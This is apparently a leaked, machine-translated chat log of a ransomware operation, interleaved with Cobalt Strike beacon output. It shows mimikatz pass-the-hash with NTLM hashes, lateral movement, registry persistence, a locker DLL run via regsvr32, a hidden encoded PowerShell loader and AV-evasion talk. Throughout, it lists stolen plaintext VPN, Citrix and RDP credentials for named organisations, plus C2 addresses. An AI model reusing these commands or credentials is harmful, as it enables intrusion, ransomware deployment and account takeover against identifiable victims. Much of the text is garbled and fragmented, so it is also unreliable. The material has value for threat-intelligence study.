/ntlm:1737a8ca4966a1b4cf767232b0a4bd58 /run:"%COMSPEC% /c echo 2e8d2fa8e2b > \.\pipe\4fee59" command [+] host called home, sent: 23 bytes [+] host called home, sent: 438863 bytes [+] Impersonated NT AUTHORITY\SYSTEM [+] received output: user : aandaservice domain : SPROUSELAW.COM program : C:\WINDOWS\system32\cmd.exe /c echo 2e8d2fa8e2b > \.\pipe\4fee59 impers. : no NTLM : 1737a8ca4966a1b4cf767232b0a4bd58 | PID 11124 | TID 8532 | LSA Process is now R/W | LUID 0 ; 1696015470 (00000000:6517246e) \_ msv1_0 - data copy @ 00000275420FFA80 : OK ! 
\_ kerberos - data copy @ 000002754222D6C8 \_ aes256_hmac -> null \_ aes128_hmac -> null \_ rc4_hmac_nt OK \_ rc4_hmac_old OK \_ rc4_md4 OK \_ rc4_hmac_nt_exp OK \_ rc4_hmac_old_exp OK \_ *Password replace @ 000002754218E768 (32) -> null beacon> shell copy x64.dll \192.168.100.227\C$\ProgramData\x64.dll [*] Tasked beacon to run: copy x64.dll \192.168.100.227\C$\ProgramData\x64.dll [+] host called home, sent: 84 bytes [+] received output: The referenced account is currently locked out and may not be logged on to. 0 file(s) copied. ````pth SPROUSELAW.COM\aandaservice 1737a8ca4966a1b4cf767232b0a4bd58```` beacon> pth sprouselaw\aandaservice 1737a8ca4966a1b4cf767232b0a4bd58 [*] Tasked beacon to run mimikatz's sekurlsa::pth /user:aandaservice /domain:sprouselaw /ntlm:1737a8ca4966a1b4cf767232b0a4bd58 /run:"%COMSPEC% /c echo b7a7be09788 > \.\pipe\cb0f70" command [+] host called home, sent: 23 bytes [+] host called home, sent: 438863 bytes [+] Impersonated NT AUTHORITY\SYSTEM [+] received output: user : aandaservice domain : sprouselaw program : C:\WINDOWS\system32\cmd.exe /c echo b7a7be09788 > \\.\pipe\cb0f70 impers. : no NTLM : 1737a8ca4966a1b4cf767232b0a4bd58 | PID 9896 | TID 936 | LSA Process is now R/W | LUID 0 ; 1695752222 (00000000:6513201e) \_ msv1_0 - data copy @ 0000027541E22080 : OK ! \kerberos - data copy @ 0000027541F15C08 \_ aes256_hmac -> null \_ aes128_hmac -> null \_ rc4_hmac_nt OK \_ rc4_hmac_old OK \_ rc4_md4 OK \_ rc4_hmac_nt_exp OK \_ rc4_hmac_old_exp OK \_ *Password replace @ 000002754218FAE8 (32) -> null `````` user : aandaservice domain : SPROUSELAW.COM program : C:\windows\system32\cmd.exe /c echo a093d2314f1 > \\.\pipe\cf9cc0 impers. : no NTLM : 1737a8ca4966a1b4cf767232b0a4bd58 | PID 19196 | TID 15936 | LSA Process is now R/W | LUID 0 ; 575605488 (00000000:224f0af0) \_ msv1_0 - data copy @ 000001FD13FD6080 : OK ! 
\kerberos - data copy @ 000001FD13E24C88 \_ aes256_hmac -> null \_ aes128_hmac -> null \_ rc4_hmac_nt OK \_ rc4_hmac_old OK \_ rc4_md4 OK \_ rc4_hmac_nt_exp OK \_ rc4_hmac_old_exp OK {\_ *Password replace @ 000001FD13F107E8 (32) -> null `````` pth sprouselaw\aandaservice 1737a8ca4966a1b4cf767232b0a4bd58 ``` ``` The referenced account is currently locked out and may not be logged on to. ``pth sprouselaw\administrator 59ae5e3ea853a81e1dsfsdfsdfse0e3fafbb052qw68455-721-18c line 19 through 37 с 192.168.100.227 to 192.168.100.89https://ru.malwarebytes.com/business/endpoint-protection/`` 192.168.100.100 192.168.100.102 192.168.100.103 192.168.100.105 192.168.100.106 192.168.100.107 192.168.100.108 192.168.100.110 192.168.100.111 192.168.100.114 192.168.100.117 192.168.100.118 192.168.100.120 192.168.100.130 192.168.100.134 192.168.100.135 192.168.100.136 192.168.100.138 192.168.100.139 192.168.100.140 192.168.100.142 192.168.100.143 192.168.100.144 192.168.100.145 192.168.100.147 192.168.100.148 192.168.100.150 192.168.100.152 192.168.100.153 192.168.100.154 192.168.100.155 192.168.100.156 192.168.100.158 192.168.100.160 192.168.100.162 192.168.100.164 192.168.100.165 192.168.100.167 192.168.100.168 192.168.100.170 192.168.100.171 192.168.100.172 192.168.100.175 192.168.100.176 192.168.100.182 192.168.100.187 192.168.100.189 192.168.100.196 192.168.100.198 192.168.100.207 192.168.100.218 192.168.100.222 192.168.100.224 192.168.100.226 192.168.100.227 192.168.100.228 192.168.100.229 192.168.100.230 192.168.100.231 192.168.100.232 192.168.100.233 192.168.100.234 192.168.100.235 192.168.100.236 192.168.100.237 192.168.100.238 192.168.100.243 192.168.100.245 192.168.100.246 192.168.100.247 192.168.100.248 192.168.100.89 192.168.100.93 192.168.100.94 192.168.100.95 192.168.100.96 192.168.100.97 192.168.100.98 192.168.100.99 192.168.111.120 192.168.111.134 192.168.111.135 192.168.111.138 192.168.112.117 192.168.112.144 192.168.112.153 192.168.112.154 192.168.112.156 
192.168.112.157 192.168.112.158 ``cavona kmd5 both by5183 dustintp c2a23920677e464f359320c23947c237 5125235 aandaservice 1737a8ca496a1b4cf767232b0a4bd58 66048 friends who are out of work or in dead-ends sit - throw your dlkudayLekha shalomUtra in hut, comrades!oday Vovao Semyon helloDay, what grids will be in work? OPTION added functionality to run the locker, which removes some of the AB detects when dropping it on the disk Run via regsvr32 regsvr32.exe /s locker.dll - without arguments regsvr32.exe /s /n /i: "here arguments" - with arguments ``#corp-televisa-com-mx#pcsb-org what do you have in the works at the moment? thanks ``yufdvfte5645warKHAGBSD``380fd7621d03826307b8993ad84c2ecf) waiting for hashes in the root changes everything) ah, well, once pressed do not trust ... on tylufonin not trust, I pressed the hashes, the place clears[ ](https://mediaeveryone.I don't trust tilufonin don't trust me, I clicked it, there are hashes and clears[ ]() com/channel/general?msg=MpgDjanMwbZxXyA6c) to the work pc you hooked a personal iphone? but here's what is it, I have to get dirty again and scour conferences I also have not all left after reinstallingI clean everything immediately after closing the entire computer. I sprinkle holy water.I'm not talking about the last weekdastop, in general, for all the time? I'm talking about all the cases for all time)there in the archive 2 files, 1 - ntlm, 2 - clears40 archives will not download) all ntlm in one archivemake in one file is not necessary divide the groups into the sameoba format will do file only ntlm? ``` c933798f947972ca9d08ba805008d6ca ``` or is this okay? ``` CORP\lkperezcer:::8d3fe083b7e1fcb6f7a069fb8d7a75f5::: ``[ ](https://mediaeveryone.com/channel/general?msg=EQ2NwKzr46SjeK49M) silent. 
not let me in, cookies are rotten all your ntlm hashes me in the archives collect from their casesmoy have fallen off - I'll try to re-enter them from public resourcesyou task for half an hour maximum - to collect the biggest lists of clean passwords + you have networks at workdobre gancet so on tasks for todaya, everything okIt's strange you two in my networkNo one of them is bazetted anywhere?HiHi:moyai:write to the groups in which you workTax, well, let's see what was done while I was away and in general what is doneHi HiHi:moyai:moyai:moyai:moyai:moyai:moyai:moyai:moyai:moyai:moyai:moyai:moyai:moyai:moyai:moyai:moyai:moyai:moyai:moyai:doktat dlls were built with the flag -keep?1-2 pcs where there is vomozozez where you put it?`` beacon> shell reg query HKCU\Environment [*] Tasked beacon to run: reg query HKCU\Environment [+] host called home, sent: 57 bytes [+] received output: HKEY_CURRENT_USER\Environment Path REG_EXPAND_SZ %USERPROFILE%\AppData\Local\Microsoft\WindowsApps; TEMP REG_EXPAND_SZ %USERPROFILE%AppData\Local\Temp TMP REG_EXPAND_SZ %USERPROFILE%AppData\Local\Temp OneDrive REG_EXPAND_SZ C:{Windows\system32\config\systemprofile\OneDrive UserInitMprLogonScript REG_SZ rundll32.exe C:Windows\Temp\STA-NURSEAL-20201020-2033.dll,entryPoint `````` - Load this DLL into a writable directory - Click on session, persistence - non-elevated - userinitmprlogonscriptkey - Type Command : rundll32.exe C:\temp\keep64.dll,entryPoint (MUST specify full path to dll file, MUST rename dll file before loading into something more "organic" depending on files around it) - Run - Check if the registry entry was created with a shell reg query HKCU\Environment ``1 this is a must and 2 if all goes well tomorrow by 4 and tomorrow definitely closes 1-2 networks put in current networks new and you can go get it http://github.com/0xthirteen/StauKitokili at the end of this month or next month so new ones on receipt immediately check it when? 
old cobbs then disconnect you from english[ ](https://mediaeveryone.com/channel/general?msg=ZxszvNDaKbZKfk3fL) take it out who doesn`t already have it `` 23.106.160.195 https://topevi.com - 185.150.190.113:61718 O5xFflqqDG7LDQJUDbdtkkj54zQ8QDVMMI0W ``coba'' 74.118.138.108 https://wolfnew.com - 209.222.98.96:32878 onsOJxzeGz75Nt2p0tGYzjn7oTi5Eo6F644 ``Boys write here on VPN https://helpdocpt.club/forums/vpn.11/ like what's what''. user3 user3 @user3 💬 02:00 Domain ing server: STAKC-DC2019.STAKC.local:389 tl1 Team Lead 1 @tl1 Admin 02:01 I.e. to create a conf? user3 user3 @user3 💬 02:01 yes user 7,4,9,3 ``Which I asked you about? Will there be a confab or not? Have you heard anything from them? No, after the closure of the timelines have dropped by a hundred hours I had two, now check the crisp is there? 172.93.109.18:51630 S36rQDbsTVH7D62swcBBexyxGkbNBFalsgx ``give me kobukak too many fuck-ups setoknu if off, then give me then also grid#skytechinc-com from esxi looking for#henrystreet-org creeds from the sphere looking for so what are you doing? hiuser3 stuck in traffic, but so all come? hi:space_invader:all say goodnight do tomorrowto 5okay then for today alla, got them online 5 not, there are only three in the sphere[ ](https://mediaeveryonecom/channel/general?msg=La7JvzhF8okm35g2o) mb to dump? and some creeds are from trastav #corp-televisa-com-mx untwisted and snuck into the servak, got new creeds, tomorrow as someone will be available on the other machine and think the DK will getaustavlja to find kerds from two esxi and everything is ready found two more nasa with backups, 4 in total found the kerds from the sphere, there are three esxi, but there are 5 on the network, we need to find 2 more passwords #henrystreet-org scanned the ports and checked all the web mordas, no esxi and sphere, the kerds are in progress. 
Of at least something worthwhile I found: ``` https://login.symantec.com/sso/idp/SAML2 it@henrystreet.org Hs$54321 https://my.vmware.com/web/vmware/login amendez@henrystreet.org H$$54321 ``Describe what was done for todayTo be filled upRaised the form, set up.And tomorrow by 11Describe the result of today in groupsmaximum we can go by 11All it costs to go 1:30This is a very bad timeWhy so early?tomorrow by 10 to 9Today I'm not long on computers How's it going? scanning subnets from ad_subnets - looking for where I admin read the documentation on psh empireDetail progress on the tasks I've done what Ian just going to deal with youIt turns out that only @user8 free?i'm with the same sessionnu since the foprum then ok raise the foprum me asu.eu? apparently, i personally do not have a task yet finished with vpc just a few minutes ago, on the nets what do you have on the tasks?:space_invader:hellohypoka play with the testing tools please excuse me friends, with sessions while a little stupor, probably a couple of hours to solve mbe earlierwould give new sessions (now I will try to namut, backdoor fell off just domain where the backdoor was dead all who were alive? goodnight goodnight goodnight no sessions. Will there be any new ones? Good morning:flag_il:Night-night-night-night-night-night-night-night-night-night-night-night-night-night-night-night-night-night-night-night-night-night-night. https://vpn.floridapoly.edu ``` I'm on a VPN on my hard drive. Checked the network for ms17\bluekeeper\smbghost (selectively) - all bypassed. there is still a way to find out dc and check it on the zerologon so we will be late late we will close the network tomorrow by 3 write statuses in groups have tried several versions of ms17 no good. I've scanned the network. There is one ``. Host is likely VULNERABLE to MS17-010! 
``` but ``` [-] 10.200.101.73:445 - RubySMB::Error::CommunicationError: Read timeout expired when reading from the Socket (timeout=30) ``annotify status to groupswho finished rdp only 2 snapshots, write password and what can do snapshot@tl1 add me to @user4 in group pleasewill you restore work dedic, pack all data keepass, but how can I do to 9000 with vpn could hook up?) like yesterday I'm digging in the dedicke, vpn yesterday's network deployed who do what? it's on the setting rpn do not create new users, change the pass and work with the current one is not enough from 2424? and I already put a new password of at least 30 characters, including letters, numbers and symbols @user4 network is almost dismantled, today it should finish with it. 2 people to help him will be allocated, there is a fairly large network so it is likely that today we will be a long time sessions are expected to check the power settings on the OS to not go to sleep then 10 it will not be a month I'm on the old place 2 people? 3,7,8 dropped the one that is possible to leave the 10 let it be 10lubomne 16 all on the spot write what granddick you want (10,16) I'll give you access in person you set up for yourself, install the software and change the password from your account send me the new password i give you a snapshot of the current state to be able to roll back to the configured arrow as soon as everythinga although let's not wait another 7 minutes the rest of it yes199.241.189.58 seems alive - i meant your basic that originally gave you stayed 2 already took away that temporary gave you which already have, it can keep? 3 vin 10 and 3 vin 16 rdp come up yet? hello all hello:space_invader:good weekend on nn by 1 o'clockfiles deletedsessions in slipstream well worth a try * it is quite worth trying msf try? 
different loads, ports i ask if anything, do not waste time)@user3 already a few days it bangs it sits next to you therea information as i understand by tpsh no?:#sisd-net let's leave for another day today until 12:skull:so it is already dead)there stall should be up to 40 seconds11 minutes pingingnyayaat something like ACADEMIC.NET should not be seen there your in tpsh came to user3 and what to do with it next?i can't see how to do anything else with it!) how to spam it from usera (i'll try it in ptsh ghbktntkf jn .pthf 9 and no other variants? it's probably portne, it does not bitemakafitam still try what av? there are a couple more rpn:disappointed:no there are no avs did not start it, try different cobalt load options - session does not come there are any other options to get the session? or AV cuts the connection as an option - there is a whitelist for IP on the TCP connection pinged but the process hangs and no session in general summing up not the fact that there is no output traffic on the 443 portd) I have not checked...copied from the Russian-language resource? Yes and I see there ?????? 443 ?????????????dir=INlocalport 443 action=allow dir=IN you use a rule for the firewall and for that matter if it is not there, then the software on your machine does not have a software that keeps 443 open-most likely there would be a web server if the netstat was 443 port local open 139 445 and so e shows just open ports more role flag-anetstat -nikak, assumed the netstat does not have it how did you determine that 443 is closed? daleenet) the question about the busy port is relevant? in other words, the current machine through 57431 port makes a request to 172....195:443 on the right remote + port as you see on the left is the local address and port is the netstat hat` `` Active Connections Proto Local Address Foreign Address State ``that is, the port is busy with your coba? `s external[ ](https://mediaeveryone.com/channel/general?msg=B2vsb4MHfdZiYoRMP) ip 172. 
what is it? read[ ](https://mediaeveryone.com/channel/general?msg=AHk7aiQJYEZN9R4Tw) read the last 30 messages, well, we need to change the port or redirect the session on 443 by idea should not come to me on what? all responded? on cmb link445 on cmb, it turns out, too i have not tried, but i think on the 80th you can raise the session on me on i zumeroka you do not smoke? ok i will wait all kureyatsko rather no than yes they are long?i'm in my office and i see that they're not there i have all "online" status some are away for now@user8 is responsible for all? won't come[ ](https://mediaeveryone.com/channel/general?msg=6Pib9yhKR6fKGMYDj) this[ ](https://mediaeveryone.com/channel/general?msg=vkaZGMZbNa7du9uhB) or this[ ](https://mediaeveryone.com/channel/general?msg=rEMML3ycEFazRDrxT) this one which one? Can you tell me please - if the 443 port is closed, the session will not come to the coba? ``` + question to all above we have two people in the team) not we have https domains and the port is 443 so it's more a question of what to do with it if the port is closed)what? @all you a questionPlease tell me - if the 443 port is closed, the session will not come to the cob? https://lab.devry.edu/vpn/index.html D41111543 Carolann#05302009 https://lab.devry.edu/vpn/index.html d40016842 Jackson3 https://lab.devry.edu/vpn/index.html d01677853 Lilly535 https://lab.devry.edu/vpn/index.html d01480444 aDv!9659 ``` @user9 do you have 2 more nets to work with? https://vpn.floridapoly.edu ``` I'm scouring the sabnets in search of dk - check on zerologontak, who's doing what write to the groupsnetIn ptsh you can shove exeshniks into memory as in the cob? I still have problems with dedik - no++? everyone has work * yeahAll come?helloGood day to all:space_invader:okk 12 suggest an early and early endTomorrow by what time? See you all tomorrow thank you and go home in slipstreams behind you remove the files.net removed AD. LA no. 
Looking for where the current polzak admin in the subnets from the sysbetstsuspasiblE I have nothing, try the other loads and work through ps` https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx` in `https://paloca.cernerworks.com/citrix/prodweb/ dr1434 dr14349773` yt pfgecnbnm cmd and ps`sharecare.com` - error when logging into citrix `mch1.org` - no access at all anywhere except medical app, where login and password cannot be entered `protransport.cloud.com` - only have access to the freight application, the login details do not fit ``unf.edu `` - now in operation, taken off adinfo, DA, DK, kerbs transferred tl2, taken off the ball list, now network walkthrough and take down mimic+hashdampane gives you access from the ip dedic ``` https://login.medimizer.net/rdweb/pages/en-us/login.aspx ``` Citrix doesn't lead anywhere except for admin sites, there is a VPN tunnel on the gateway but no one can see any computers on the net ``` https://liveopsnation.okta.com/app/citrixnetscalergateway_saml/exk25j1wbvpyk8bfl2p7/sso/saml ``` in work - about the progress wrote in the confr not much progress in words, not enough PCs at the moment it is /16 on 445 ``` https://mcloud.mgrmedu.com/rdweb/pages/en-us/login.aspx laci.riley@mgrmedu.com I can't get anything to work, closed by the admin cmd admins please write about which domain it's about and what's wrong or so i don't understand how i can try eleveit kite via that tool, tomorrow i will try to do it via deadic https://paloca.cernerworks.com/citrix/prodweb/ dr1434 dr14349773 What was wrong with the first one? @user3 I have 2 accesses written down on youI have nothing, I'll try the other loads and work through pswhat went wrong or did it work and what progressSISDNET - continue to `scan subnets from sabnets - looking for where the admin polzak ` straight on all their current accesses that bralitak well I would still first remove the hell, kerb, sharpfinder. 
the current tour allows if the AV is not too biting8443 port still wanted to write about it) rev_tcp_rc4 very good from msfCheck different ports rev_http rev_https 80/443/53I would have played with listener and portsada i think here check in kobu and in armagate 2 loads and you can understand that not pull)not once rolled sessions in armagate info unloadnado had to work under current conditions, remove kerb etc if not allowed a clean dll then traffic blocks it there is not a loadTried to run different loads. did not work till 11 work, at 11, the total for 10 minutes and go home at 11, wrap it upwrite in groups that done pishite in conffor where the problem[ ](https://mediaeveryone.com/channel/general?msg=GBuGjFSkRq2fukyFx) in general with my session is sad i run a tool - it works and session flies away on others not i ran - says that on the machine where i have access to admin spheres but he does not have rights why did you run toshairfinder? check if polzak has admin rights to other machines ? i have no progress with mgrmedu.com polzak can't get it up. I'm surfing the net. + sessions keep dropping - avrubit checked with scanner ms17 the only alive server 2008 - dead took the kerbs off the trusts and gave them to tl2 i'm thinking what to raise i'm trying to get the system what results do you have? it's dirtier than the ground)yeahlfcobes? load what? 
i'm running `https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx bbbwalkerj colorblue76!` in cmd/ps load ``powershell -nop -w hidden -encodedcommand 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 ``The process is created, but the session does not come amsi bypass script blocks as malwarekak malware script[ ](https://mediaeveryone.com/channel/general?msg=CdzqBnJxqPN8YbhkA) I tried it, it blocks avi still, I repeat I don't know how many times, remove your tules and any of your files from the system, remove the kerberostom if rubeus blockutpoyadalashev further it depends on you how you will raise them) you have the whole githab) ability to work with cmd, download files and so on, but how to raise privileges through this tool?if there's no file, there's no kerbs either, right? when you remove the kerbs, send it to @tl2 and duplicate it in the conf@user7 in the conf@user9 conf, please@user9 made the conf thank you@user4 duplicate it in the conf[ ](https://mediaeveryone.com/channel/general?msg=bHAEAFsYYCqokD8Bf) mgrmedu.com me, I threw tl2 can chat, you can pour rubyuskstatino no one else? no one else took kerbs? take one just for yourself you have 4 dedicates` `` https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx bbbwalkerj colorblue76! ``This one here requires an old sitrickets weight, I download it and when I install it it says to me like: It's not really a new version? Put the newest. If I tear down the new one that is standing the guys can not use the shellcode in the privateIn @tl1 there is a shellcode builder so it starts like this ``. rundll32.exe C:\path\to\file\file.dll,entryPoint regsvr32.exe /s C:\path\to\file\file.dll ``this is the FUD``. ./shellConcatination --source=shellStarter_llvm_x64.dll --target=x64.dll --addBin=x64.bin -self -keep `````` Doing a cryptor raw to exe session does not come. 
``` It opened...I had a message that the site does not support tls 2.0 or change the default gateway to another one just to check if it is available. Reset it completelyfresh? What browser do you use? Does it show the page? It's ok. The session is not coming from the default gateway. https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx is just a white screen, so no valid CREDES? https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx bbbwalkerj Colorblue76! ``There's no connection here? phoen1xasp.com `````` https://paloca.cernerworks.com/citrix/prodweb/ dr1434 dr14349773 ``Don't run cmd, powerShell, taskmgr everything is mocked up admin then you are the quietest in the job and why do you need a replacement writeLf you need anything else? https://mcloud.mgrmedu.com/rdweb/pages/en-us/login.aspx laci.riley@mgrmedu.com MeduLR@1234 ``` @user9 replacementdavaynetwebuy I can give you more access, it may work faster there than here ``` beacon> portscan 172.0.0.1/24 21,22,23,25,53,80,81,110,119,137,139,143,443,445,465,587,993,995,1080,1194,1433,3306,3389,5500,5800,5900-5906,8080,9001,9030,9050,9051,9090,9091,9100 icmp 1024 [*] Tasked beacon to scan ports 21,22,23,25,53,80,81,110,119,137,139,143,443,445,465,587,993,995,1080,1194,1433,3306,3389,5500,5800,5900-5906,8080,9001,9030,9050,9051,9090,9091,9100 on 172.0.0.1/24 [+] host called home, sent: 93245 bytes [+] received output: (ICMP) Target '172.0.0.60' is alive. [read 8 bytes] [+] received output: (ICMP) Target '172.0.0.97' is alive. [read 8 bytes] (ICMP) Target '172.0.0.70' is alive. [read 8 bytes] (ICMP) Target '172.0.0.111' is alive. [read 8 bytes] [+] received output: (ICMP) Target '172.0.0.168' is alive. [read 8 bytes] (ICMP) Target '172.0.0.186' is alive. [read 8 bytes] (ICMP) Target '172.0.0.188' is alive. [read 8 bytes] (ICMP) Target '172.0.0.187' is alive. [read 8 bytes] [+] received output: (ICMP) Target '172.0.0.237' is alive. 
[read 8 bytes] [+] received output: 172.0.0.188:443 172.0.0.187:443 [+] received output: Scanner module is complete ``Check Web Ports'' somewhere in the vicinity beacon> portscan 172.0.0.1/24 445 icmp 1024 [*] Tasked beacon to scan ports 445 on 172.0.0.1/24 [+] host called home, sent: 93245 bytes [+] received output: (ICMP) Target '172.0.0.60' is alive. [read 8 bytes] [+] received output: (ICMP) Target '172.0.0.97' is alive. [read 8 bytes] (ICMP) Target '172.0.0.70' is alive. [read 8 bytes] (ICMP) Target '172.0.0.111' is alive. [read 8 bytes] [+] received output: (ICMP) Target '172.0.0.186' is alive. [read 8 bytes] (ICMP) Target '172.0.0.188' is alive. [read 8 bytes] (ICMP) Target '172.0.0.187' is alive. [read 8 bytes] (ICMP) Target '172.0.0.168' is alive. [read 8 bytes] [+] received output: (ICMP) Target '172.0.0.237' is alive. [read 8 bytes] [+] received output: Scanner module is complete ```:ok_hand:at 24 scan for DNS sabnetupo put scan /16 of your ip is on the interface check ipconfigda alive it seems to have fallen offavpn alive? and ping does not pass to the ip that ip scanner gave[ ](https://mediaeveryone.com/channel/general?msg=zhxKp8Y2oYYWBd72t) does not work to move anywhere napn streaked but in the subnet 172.169.16.1-172.169.17.254 portskan does not give anything took the firewall in their hands and blocked, okzablochal rdp connect why is it? kaspersky nailed itawn your addicts second so he probably and blocked the entrance[ ](https://mediaeveryone.com/channel/general?msg=XNXcefd8b4k5Mz7n8) yes, Citkrix will not let without edr and windef was a palsy turn on) created[ ](https://mediaeveryone.com/channel/general?msg=4kBFYh2BFCPu3ruWM) there's a session did you have kasper on the hard disk? OK, I'll rewrite it[ ](https://mediaeveryone.com/channel/general?msg=iXam5Ja66xMDeu8gL) no, it was a text file. 
os, what did you do, what you got, what was expected, what's the problem and now I took off the toolchain before I got thrown out - I took off by hand - if your hands - this archive? so I do not understand, you took it off by hand or through toolchain? i did not finish downloading - more than 200 meters file was `` `` https://vlab.unf.edu/vpn/index.html N01447311 Commercial5207! ``` @user8 replacement from tulchain adf returned 11 users and how many without tulchain? maybe it's okay? or maybe it's a bug? from tulchain - it returned 11 users in adfind, and I downloaded the file 238 MB there is nothing at all?[ ](https://mediaeveryone.com/channel/general?msg=t33YpDhLCbMWQiLaW) there is only one application and these creed him not catalyze more, take hell, take the access and get into the network who does that) creed citr....and the record of persist from the registry disappearednu I put on my coba persist where did you get dll to fix? ummy everything disappeared, even dll to fix there is nothing there av or something? strange in the appdata from the usera where you left them? there is strange.... i just re-logged through cirta, re-session to myself, and no my files there already ... how so? burned by the demons? ah, good come back i already.then he had already hell info take away someone @user4 in the net so well, you now have 3 dedicates and wpn not turn off even after reboot most likely flew a dedicate for wpn means from portal with flashy config) well go to the link he himself offered to download from the portal?installed from where? there only citra installed and all, not even configured it put vpn? i and user 9 on it worked ddik not connect to what is it? who last worked at 199.241.188.186? https://protransport.cloud.com/citrix/storeweb/ rtgroup2@proloads.com blue4586 ``` @user8 replaced ad infosisd@user4 from where? @user8 beep me in the confu I had a session failed (progress described in the confu@user9 @user7 in work what other 3 people are busy? 
and you're an admin? ok, now add a user group burned anomaly and removed the remote access group `the connection was denied because the user account is not authorized for remote login `` what do you mean not authorized for remote login ?who has the ipn up / have access to the network ? did not understand the question who else ? @user9 at worklsadmiki some sites.i have one, from citrix can not go anywhere iphone is up and running on a new computer - i'll try to see what's on the net under ipnomtoolchain for tests1 how many networks are up and running? FH*(UG&$*WFHWH&*efu ``What to do next? What's the plan? You mean the citrix receiver? I also kinda connected, but then the ddik went away@user9 and what's your problem? I connected to vpnuwin 2012`` 206.221.176.24:37345 Administrator:V86Rk1Dd6Ck1yqThbD6Dh8Cg0Z8iLiiY hotswapdate.com not yet available in the daedic is it still not fixed? the same situation I can not run cmd and powerShell is closed by the admin, the file does not fill up.what's your confab? then the lpe and so on)) if you forget: AD INFO, LA, DA, EA, DCnet, all according to the algorithm i'm in the system, then as usual? or some other inputs? i do not understand the question, we develop the whole grid, i mean AD to shoot? and while the daemon is still not available i am still logged in, i just a little do not understand everything there, in this link, leads to the sites[ ](https://mediaeveryone.com/channel/general?msg=TPa6bFNG43pgJ65BY) are you logged in? or a user? https://connect.mch1.org/vpn/index.html lpsmpep2 vk2lazu4 ``` @user8 replacementdescribe in confutacci@user8 where are we? ok, he'll reboot and bring him to the cobb just in case he went for a vpn taqi so weno after start I worked in it 10 minutes moreplugin citrixa haven't you run a vpn on it by chance?) 
yes, a few minutes he will work and then 15 is not availablepohodu diddik completely died (199.241.188.186) ``` https://mydesktop.sisd.net/vpn/index.html jeksae happiness3 ``` @user4 change the citrix receiver something like a pass-through but it's not going online? [ ](https://mediaeveryone.com/channel/general?msg=9uCLqBtxTJHonFyfv) the dedicator is falling off, but I've been there - everything leads to the admin sites JE*SG&Y*FwEYHIf7g8we JE*SG&YY*wEYFEYffggWe ##+Dadokin? but there's a detection rate higher there's a variant of crypta shellcode in the shellcode in the dllnea? https://liveopsnation.okta.com/app/citrixnetscalergateway_saml/exk25j1wbvpyk8bfl2p7/sso/saml jgarcia693@aol.com thebear#1 ``` @user9 replacement@user3 replacement ``` https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx bbbwalkerj Colorblue76! Pass the dedik @user8 in the meantime, the user is logged in and then the user disappears from the list. your changes could not be served due to an invalid configuration of the account PROD ica file is a file that citrix receiver opens and you have to put citrix receiver which will open this file. [Encoding] InputEncoding=UTF8 [WFClient]. ProxyFavorIEConnectionSetting=Yes ProxyTimeout=30000 ProxyType=Auto ProxyUseFQDN=Off RemoveICAFile=yes TransparentKeyPassthrough=Local TransportReconnectEnabled=Off Version=2 VirtualCOMPortEmulation=On [ApplicationServers] Report Request Maintenance Prod= [Report Request Maintenance Prod] Address=;40;STA664590668;2023A7A9232D60230A425A54DEFFA6 AutologonAllowed=ON BrowserProtocol=HTTPonTCP CGPSecurityTicket=On ClearPassword=53F80104235331 ClientAudio=On DesiredColor=8 DesiredHRES=0 DesiredVRES=0 Domain=\6AA387C7B8517C82 DoNotUseDefaultCSL=On EncryptionLevelSession=EncRC5-128 FontSmoothingType=0 HDXoverUDP=Off HTTPBrowserAddress=! InitialProgram=#Report Request Maintenance Prod Launcher=WI LaunchReference=558DD381B14D807B6BEEDE6BACFB10 LocHttpBrowserAddress=! 
LogonTicket=53F801042353316AA387C7B8517C82 LogonTicketType=CTXS1 LongCommandLine= LPWD=156 NRWD=93 ProxyTimeout=30000 ProxyType=Auto SecureChannelProtocol=Detect SessionsharingKey=SHNGKRJyAVxk+e5emFlorzKJwYLVSQhb SFRAllowed=Off SSLCiphers=all SSLEnable=On SSLProxyHost=ag2.cernerworks.com:443 startSCD=1606819909507 Title=Report Request Maintenance Prod TransportDriver=TCP/IP TRWD=0 TWIMode=On WinStationDriver=ICA 3.0 [Compress]. DriverNameWin16=pdcompw.dll DriverNameWin32=pdcompn.dll [EncRC5-0]. DriverNameWin16=pdc0w.dll DriverNameWin32=pdc0n.dll [EncRC5-128]. DriverNameWin16=pdc128w.dll DriverNameWin32=pdc128n.dll [EncRC5-40]. DriverNameWin16=pdc40w.dll DriverNameWin32=pdc40n.dll [EncRC5-56]. DriverNameWin16=pdc56w.dll DriverNameWin32=pdc56n.dll ``All kerbs to @tl2a, all)``or does medimizer refer to user4? https://login.medimizer.net/rdweb/pages/en-us/login.aspx bill@biomedtechs.com 2003Proline ``Yes, I then changed the message to medimizerthere were just 2 accounts@user9 you took access from @user4 he has the domain ``mysystems4pt.com```https://apps.oasispetroleum.com/vpn/index.html bmolinaro b5ab80fbd9E!``[ ](https://mediaeveryone.com/channel/general?msg=gekDndf3GK77gi9qR) +``` https://login.medimizer.net/rdweb/pages/en-us/login.aspx bill@biomedtechs.com 2003Proline ``Zabrad https://paloca.cernerworks.com/citrix/prodweb/ dr1434 dr14349773`` https://portal.mysystems4pt.com/vpn/index.html PWilliams061 Create a confab, add you sort and write who took what accesses are valid 5 pieces``. 
https://paloca.cernerworks.com/citrix/prodweb/ dr1434 dr14349773 `````` https://citrix.sharecare.com/vpn/index.html ad.alex.whittier Ph@nt0m01Beatz87 ``And there will also be rdp`` https://login.medimizer.net/rdweb/pages/en-us/login.aspx office@biomedtechs.com Bmt5510shoP https://login.medimizer.net/rdweb/pages/en-us/login.aspx bill@biomedtechs.com 2003Proline `````` https://portal.mysystems4pt.com/vpn/index.html PWilliams061 Signal061relent `````` https://apps.oasispetroleum.com/vpn/index.html bmolinaro b5ab80fbd9E! ``Don't you remember how it's done?'') dismantle and get to work you have 2 ddisks to work with vpn + citras from the scale of work, I give you a list of citras + vpn + citras, while will be in stockDo not, just no one needs it, all are gone, someone wants another new coba? spidfhoUSDFHI&SEUHFIjoaPS;ddsijghf If the koba does not connect to the koba then it is inaktiv right?i have 2 inactive3 koba means workingkhaip domain with parentheses in googledav query as you wrote, with parentheses23.106.160.86 no information no domain atypip domain or ip koba checked?i have two clean cb's if there is info that ip marked as cb's then cb's in the snow search 123[.]123[.123[ ]123zasvilischestvennym as koba strike at whom koba active check the domain ip in google on detektovydam 